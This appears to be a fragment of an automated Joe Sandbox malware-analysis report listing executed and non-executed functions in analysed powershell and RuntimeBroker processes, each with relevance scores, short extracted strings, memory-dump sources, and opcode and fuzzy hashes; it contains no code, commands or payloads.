Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36817cfea90e12d209fc6f3b18923ec9b81d125550c8fb9e18ce5be2599786ec
Instruction ID: 1e2ca5dcd1fc5d573d1df94be000375488637a0338b0b2c88ceb354707a56bb3
Opcode Fuzzy Hash: 36817cfea90e12d209fc6f3b18923ec9b81d125550c8fb9e18ce5be2599786ec
Instruction Fuzzy Hash: A6F0BE32A0E5498FD765EB9CE0619E873E0EF0532074600BAE05DCB1A3CA26AC40C740

Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2492334930.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80

Function 00007FFD9B89A2C9 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2490480136.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
Instruction ID: 8c9cddaed84f325c485bcda86a76cabf544e5b67ade7e48303af95b0bf5ab05c
Opcode Fuzzy Hash: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
Instruction Fuzzy Hash: 53E01234804A8C8F8B48EF18C8598E97BA0FF68201B01429BE81DC7520DB719A58CBC2

Non-executed Functions

Function 00007FFD9B898BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

M_^I, xrefs: 00007FFD9B898C72
M_^6, xrefs: 00007FFD9B898BFA
M_^F, xrefs: 00007FFD9B898C6A
M_^J, xrefs: 00007FFD9B898C7A
M_^<, xrefs: 00007FFD9B898C2A

Memory Dump Source

Source File: 00000005.00000002.2490480136.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: M_^6$M_^<$M_^F$M_^I$M_^J
API String ID: 0-1500707516
Opcode ID: babffc2346c1050abf5f98c5750cc00ad599b6fe28c0f1b6bdcb5d996a8d3148
Instruction ID: 698a88e157f5e3be547aa0b9edad8586613dc3d8c9d577c9a4451944f3587467
Opcode Fuzzy Hash: babffc2346c1050abf5f98c5750cc00ad599b6fe28c0f1b6bdcb5d996a8d3148
Instruction Fuzzy Hash: DF21F6A7704466DED30A76ADBC189DC7380DB9427A38947F3E169CB583FD14A08746C0

Function 00007FFD9B8989FA Relevance: 5.1, Strings: 4, Instructions: 108COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFD9B8989FA
M_^, xrefs: 00007FFD9B898AC2
M_^, xrefs: 00007FFD9B898A2A
M_^, xrefs: 00007FFD9B898A7A

Memory Dump Source

Source File: 00000005.00000002.2490480136.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^$M_^
API String ID: 0-1397233021
Opcode ID: 8290be27e745bd22f8594c4da34fe86a7ad81ec82dc56f9857c7d78c573c957c
Instruction ID: 37b81bfd84a26cf515a8a2bea6ef506d8cadddf451accf18210f7796012d23ab
Opcode Fuzzy Hash: 8290be27e745bd22f8594c4da34fe86a7ad81ec82dc56f9857c7d78c573c957c
Instruction Fuzzy Hash: 88319EA3B0FAC75BEB5A472948790997FE0FF6679874A43F6C0D48B0A3FD1568074242

Analysis Process: RuntimeBroker.exePID: 7836, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B8B3545 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

V_H, xrefs: 00007FFD9B8B35CD

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: V_H
API String ID: 0-105569101
Opcode ID: 0f1d3a7365d9aec6e01ee2970818ce6b6a0aeaf2951b73b050059473aac1e04d
Instruction ID: 887ea63e2131f54a1e58e1eb1df5c8be619a86b8a7f181459608fb95ea750b5a
Opcode Fuzzy Hash: 0f1d3a7365d9aec6e01ee2970818ce6b6a0aeaf2951b73b050059473aac1e04d
Instruction Fuzzy Hash: 23A1F471A1995E8FEB58DB68C8657EDBBE1FF59300F4001BAD01DD72D6DB7424018B81

Function 00007FFD9B8C196E Relevance: 5.2, Strings: 4, Instructions: 172COMMON

Download Yara Rule

Strings

D\, xrefs: 00007FFD9B8C1989
d\, xrefs: 00007FFD9B8C1A69
Z\, xrefs: 00007FFD9B8C1A1E
N\, xrefs: 00007FFD9B8C19CF

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: D\$N\$Z\$d\
API String ID: 0-237293203
Opcode ID: 1a812ffbb008ac226cd5e38846f8778b936bd1ecca92cb5ed9ef804cf124729d
Instruction ID: 5efba1defa4580e7367e6364397784f5fbbf2a403e87f19e88037786ab539bc9
Opcode Fuzzy Hash: 1a812ffbb008ac226cd5e38846f8778b936bd1ecca92cb5ed9ef804cf124729d
Instruction Fuzzy Hash: 9B51CA70A0991D8FDBA8EF58C8A5BA9B7B1FF98301F1041A9D01DE7295CE34A981CF40

Function 00007FFD9B8C3555 Relevance: 4.1, Strings: 3, Instructions: 315COMMON

Download Yara Rule

Strings

Nr, xrefs: 00007FFD9B8C394D
4r, xrefs: 00007FFD9B8C368E
Nr, xrefs: 00007FFD9B8C377A

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: 4r$Nr$Nr
API String ID: 0-3193503180
Opcode ID: 7e396366c2e756930ca2b0d191884336d89660c21ee03620ff902de51f8777d4
Instruction ID: 19e1beb38ccb660a000ceb7f2c60ec04a50bed7b99a5d0f673983a0f855a4628
Opcode Fuzzy Hash: 7e396366c2e756930ca2b0d191884336d89660c21ee03620ff902de51f8777d4
Instruction Fuzzy Hash: 24C1B8B0E1991D8FDBA4EB98C865BFDB7B1FF59300F5141AAD00DE3291DA346A858F40

Function 00007FFD9B8BDF01 Relevance: 2.5, Strings: 2, Instructions: 48COMMON

Download Yara Rule

Strings

{, xrefs: 00007FFD9B8BDF15
`, xrefs: 00007FFD9B8BE353

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: `${
API String ID: 0-2175359776
Opcode ID: 48016276d38f7d853b3def24705c37091ca6c2cc10a3f12e4b6fa209f2985bf5
Instruction ID: cb1825f92d820a42e896bab5027cafcafbc7e88acce2cf6bf23bb913783ae8fd
Opcode Fuzzy Hash: 48016276d38f7d853b3def24705c37091ca6c2cc10a3f12e4b6fa209f2985bf5
Instruction Fuzzy Hash: E221E770E0926E8FEB78DF54C8A87A9B6B1BF58301F0045F9D40DA6691CB785A84CF81

Function 00007FFD9B8B051D Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 624ef8dc3e00ad0fca8c4b89704d40cb9f7361ab912f932f8d6c0f51043cae58
Instruction ID: 51575645f636bb06fce0e0f61d85189ffdb3dda75c0c13534b76b327dd6d2b63
Opcode Fuzzy Hash: 624ef8dc3e00ad0fca8c4b89704d40cb9f7361ab912f932f8d6c0f51043cae58
Instruction Fuzzy Hash: E4B13B43B1F6E64AE32673BD7C3A4F93F50DF46664B0902F7D0988A0E7EC09650686C6

Function 00007FFD9B8B05A0 Relevance: 1.6, Strings: 1, Instructions: 313COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 0c647f62f6dd9c5644603aed07ab22bf7991eed883cd9b618b172329ad6979b0
Instruction ID: 6b583880011f7d5fdff6ce1d8605d52dc0fc624717528637cc259c0024b194f7
Opcode Fuzzy Hash: 0c647f62f6dd9c5644603aed07ab22bf7991eed883cd9b618b172329ad6979b0
Instruction Fuzzy Hash: AD913743B1F6E64AE36663BD7C391E93F50DF46664B0902FBE0988A0E7EC05650686C6

Function 00007FFD9B8B05ED Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: eec6017ab0d35b5786ad56921ba84b7bf0bfa38f3c42507cd828c320992025dc
Instruction ID: 4d18941e700313818d6ed3b9f8bfb314fa10c703c163a643ecc4a313c027cc21
Opcode Fuzzy Hash: eec6017ab0d35b5786ad56921ba84b7bf0bfa38f3c42507cd828c320992025dc
Instruction Fuzzy Hash: 55916B43B1F6E60AE36523BD6C390E97F50DF42664B0942FBE0A84A0E7EC09650687C6

Function 00007FFD9B8B0638 Relevance: 1.5, Strings: 1, Instructions: 286COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 7fe3b00f9e5de8139e229a8a085468d965edfd3d7ec4b231a0627f455e1098dd
Instruction ID: a71a22df50a6aa80a960eef7dc289ac4e7e8fabb9cc6e041cb2c8dbf2f35dbed
Opcode Fuzzy Hash: 7fe3b00f9e5de8139e229a8a085468d965edfd3d7ec4b231a0627f455e1098dd
Instruction Fuzzy Hash: D8817C43B1F6D54EE36563BD6C290F97FA0EF46264B0902FBE0988A0F7EC15950687C6

Function 00007FFD9B8B0640 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 8754d33cb972abeee75737d562a28d27db7e6c04d84a31e006ebeb5e09bcfe83
Instruction ID: 95c18053beb3ecf561f38925721c8bd57a59d7fa9a3dea378abb0dffabe4d7e0
Opcode Fuzzy Hash: 8754d33cb972abeee75737d562a28d27db7e6c04d84a31e006ebeb5e09bcfe83
Instruction Fuzzy Hash: 25716943B1F6E60AE36523BD6C391F97F60EF42664B0902FBE0A84A0F7EC15550687C6

Function 00007FFD9B8C18AD Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

n\, xrefs: 00007FFD9B8C1B60

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: n\
API String ID: 0-3537540548
Opcode ID: cab66a373c54d0d9c70940a80f2ccd153b0d8928f4bef563c7595437b7de5711
Instruction ID: 88a07aa681bd2b69e5a454ccbf239ac933bbb558db75fda5d9953a9c79a23690
Opcode Fuzzy Hash: cab66a373c54d0d9c70940a80f2ccd153b0d8928f4bef563c7595437b7de5711
Instruction Fuzzy Hash: 72416D70E0A54E8FDB68FBA4C4A56FD77A1EF59300F11057ED00AD72E5DE38AA458B40

Function 00007FFD9B8B0805 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: a548cfadb902d492db0645f8fa41e032a3a66a010107fa8a6603068b9e129e38
Instruction ID: 42c135f60b2f2d9b34e4b6f9808d9b70d819bed592040d9331dc5c6bbd21258e
Opcode Fuzzy Hash: a548cfadb902d492db0645f8fa41e032a3a66a010107fa8a6603068b9e129e38
Instruction Fuzzy Hash: 1921AA62B0E29B5BD71677BC9C392E93B90FF01318F0901B7C099C90D3ED18915AC2C2

Function 00007FFD9B8C37CD Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Zr, xrefs: 00007FFD9B8C37D9

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: Zr
API String ID: 0-4206875044
Opcode ID: 00344f6f4fe43f4d075d9bf97436f8950350392aa9465003b1130c54700f08ec
Instruction ID: b9e53718cc9fed2bce094e035420d6d4423f9c2da2bc06fb36844e2b40013e83
Opcode Fuzzy Hash: 00344f6f4fe43f4d075d9bf97436f8950350392aa9465003b1130c54700f08ec
Instruction Fuzzy Hash: E51118B1E0511E9EDB60EFA9C4566FCB6F0EB18301F518177E019E2291DB3857859F10

Function 00007FFD9B8C13F3 Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

(, xrefs: 00007FFD9B8C140A

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 2e9231d48b6a8c127f66c9e19cc9145685575e5c30ce6e0dfb54771cdfe339c6
Instruction ID: ed5fcd0855b479bed42b3f245c3f76c36738231a0aa588680d1081c19c6b25a8
Opcode Fuzzy Hash: 2e9231d48b6a8c127f66c9e19cc9145685575e5c30ce6e0dfb54771cdfe339c6
Instruction Fuzzy Hash: 2ED01274D0821D8BDB14FF90C8E05FD77F1BF14300F00116A901A5B2C5CB782644CB40

Function 00007FFD9B8C2C35 Relevance: .5, Instructions: 537COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6673943724537b613aa5ac8129c2963f240c5ac18d0a525a74ffde4b8dc8ca5f
Instruction ID: 13b095ab1642c6ecb582168f168c4c08693ddfd6f38662ed33d1c17d725ed533
Opcode Fuzzy Hash: 6673943724537b613aa5ac8129c2963f240c5ac18d0a525a74ffde4b8dc8ca5f
Instruction Fuzzy Hash: 5351B762A0F7D94FE753ABB848795A97FB0EF16214B0901FBC498CB0E7D9285509C352

Function 00007FFD9B8BD2F5 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f616913b76650183c5750851a859c6ab8e8699f5edbfc4075d176267cb949c
Instruction ID: 314d9b40d7f8a2f7b690213dd4453fa32e1858195e6b67960e8083d4fceaf682
Opcode Fuzzy Hash: f1f616913b76650183c5750851a859c6ab8e8699f5edbfc4075d176267cb949c
Instruction Fuzzy Hash: 7EE15B71E1965D8FEBACDBA8C8A4BB8B7A1FF18304F0401B9D01DD72A6DA346941CF41

Function 00007FFD9B8B1648 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ec664a8426283977889ee8ea22f72e33564a24751357480a0a433efe7b2b26
Instruction ID: f4b4aee2b30e8457bb257ee62ec91a7292223acb5420f95013f925720e8ef30a
Opcode Fuzzy Hash: 79ec664a8426283977889ee8ea22f72e33564a24751357480a0a433efe7b2b26
Instruction Fuzzy Hash: F681D131B1DA5D4FDB68EF6C88615A977E2FF98300B15017AE45DC72A6DE30AD028B81

Function 00007FFD9B8B0FB0 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56420eb2c408531b5414fb72e434d2c75c9b7eb10b16c4f433a725d9f601eff
Instruction ID: 9514b2ca1232988afd84afbf4baf0d0709e61b4369b5ee9d0d8a408585cbe6cf
Opcode Fuzzy Hash: e56420eb2c408531b5414fb72e434d2c75c9b7eb10b16c4f433a725d9f601eff
Instruction Fuzzy Hash: AD818371E19A1D4BEB68EB688865BECB7A1FF54310F0042B9D01DD72E6DE3469468B80

Function 00007FFD9B8B1CAD Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be2e0111b0aa326b98f2519f5107293e774d0500d3ef88f1d5ac7b656424313
Instruction ID: 69290317f6b4f4dd6e78930009e03496d572b20b9b38cd52e9d473e9213687cc
Opcode Fuzzy Hash: 8be2e0111b0aa326b98f2519f5107293e774d0500d3ef88f1d5ac7b656424313
Instruction Fuzzy Hash: 9A51F331B19B9D4FDB58DF5888615BA77E2FF98300B15417ED45ACB291DE34E8028BC1

Function 00007FFD9B8C33FB Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47d57791025a18bee775c418770dc5cf51b7d29ab6476a990650cc9493c1f9e
Instruction ID: 375be69b3336762c40eb23b3e9438f74b29239bf5df1c044b081c9ebe5ecba66
Opcode Fuzzy Hash: f47d57791025a18bee775c418770dc5cf51b7d29ab6476a990650cc9493c1f9e
Instruction Fuzzy Hash: 9C417C7770E6A95EE712FBACBC954E97FA0EF41375B0802B7C948CB057E934944A8390

Function 00007FFD9B8C4C2D Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0794b68d30a9fba1fd17622b3effdba729975ab0db84288df23fd97555d0046c
Instruction ID: 23e9fe84f2105ac51a1827f0b5174901e5e61291a53dfb3bf98b4224ba2cc2e7
Opcode Fuzzy Hash: 0794b68d30a9fba1fd17622b3effdba729975ab0db84288df23fd97555d0046c
Instruction Fuzzy Hash: 4D514370E1995D8FEBA4EBA8C465AAC77F1FF58300F45016ED00DD72A6DE3569818B40

Function 00007FFD9B8B3145 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2987aadc10c477d373347f787deb8ae48c9e3c34d24abe4b78abc107dc178577
Instruction ID: 8fbe27191fe9c3a967362bcea7c39e5d0832030f9a6b0c68c2ccfa6cf8800621
Opcode Fuzzy Hash: 2987aadc10c477d373347f787deb8ae48c9e3c34d24abe4b78abc107dc178577
Instruction Fuzzy Hash: 9E512C30E0A52E8FEB64EBE4C4646ED77F1FF58301F51017AD009E72A6DA386A458B81

Function 00007FFD9B8C25EE Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a3e02b5b0e2865f79a9ee56687742f006129e5cf90d1c8a788fea4d0403dd3
Instruction ID: 3bd8ea4920830353dc39e471d8449122ec9f0baaa585cd3e3f0c82b7d16cdacf
Opcode Fuzzy Hash: 90a3e02b5b0e2865f79a9ee56687742f006129e5cf90d1c8a788fea4d0403dd3
Instruction Fuzzy Hash: D851E770E1452D8EDB64EFA8C865BEDB7B1FF58300F0081B6D01DA3296DB346A858F50

Function 00007FFD9B8BA838 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f4fbe48b2e0fa58617571b34aba3d2e991a9834eeba40b51cc3439f120dc92
Instruction ID: 768d32b5dcfef55d28c2514051c3b1763f2f1d59ab75cd43e625b899ee910ff4
Opcode Fuzzy Hash: 01f4fbe48b2e0fa58617571b34aba3d2e991a9834eeba40b51cc3439f120dc92
Instruction Fuzzy Hash: 0B411771E0E51F6EE751ABB888695F977E0FF19310F0245B6D02CC30E6EE34A6418B80

Function 00007FFD9B8C20CD Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9324ceefcb2eace15d4b0ca1b1cfbc3cb7d48e9518fd178010496ada2c0c38ed
Instruction ID: 12ca36fb7b63e81220aa05265013d4a43f19a96cdf8030ea989ac676ab8ba87e
Opcode Fuzzy Hash: 9324ceefcb2eace15d4b0ca1b1cfbc3cb7d48e9518fd178010496ada2c0c38ed
Instruction Fuzzy Hash: F9411A70E1965D8FEB58EFE8D865AFDB7B1FF58300F01017AE009E7296DA3469418B81

Function 00007FFD9B8C2438 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f2ef31ce66a66bdb5858b6c36e7a293a97148781efd566f3d47f7c64ca0483e
Instruction ID: 9269e9ac2fe51bb21f4354c08a7c986f9240f45306c79daaf56414a7ba96b8cb
Opcode Fuzzy Hash: 0f2ef31ce66a66bdb5858b6c36e7a293a97148781efd566f3d47f7c64ca0483e
Instruction Fuzzy Hash: 8241C770E1462D8FDB64EFA4C865BEDB7B1FF58300F1085A6D01DA3296DB746A858F80

Function 00007FFD9B8BBA62 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 806733059b55a85a99023f6186b016307548713c28c65ff220367ff6cd386564
Instruction ID: ce2bcc6c412243e9a7babaefd542b27b724c74e8566500faae9db21d45d5dfdf
Opcode Fuzzy Hash: 806733059b55a85a99023f6186b016307548713c28c65ff220367ff6cd386564
Instruction Fuzzy Hash: 0A31FE74E1992D9EDBA4EBA89861AFCB7B5FF5C300F911079D04DE32A6CE2469418B40

Function 00007FFD9B8C6E11 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d995552eec54888947ecb77e812e8e20fe25da3c9425bfc0618910e66667549
Instruction ID: 31b44ead0ad6fe3119148d42f97c5de5ce111e41b45f9079bac5a79d116bb4b5
Opcode Fuzzy Hash: 7d995552eec54888947ecb77e812e8e20fe25da3c9425bfc0618910e66667549
Instruction Fuzzy Hash: 28314CB0A0A51E9FEB51FBA8C8586BA7BF0FF29301F0105B7D419D7065DB34A6448750

Function 00007FFD9B8BBAD0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1564cbf58443fd5bbc68cef5f924c1d950bed4f20b7e6cae1a478cbf3f06e64
Instruction ID: 2587ab76779a986bdb3ab4de0dbc5c5e4c940c110e8238dccb879b91c7cacac7
Opcode Fuzzy Hash: e1564cbf58443fd5bbc68cef5f924c1d950bed4f20b7e6cae1a478cbf3f06e64
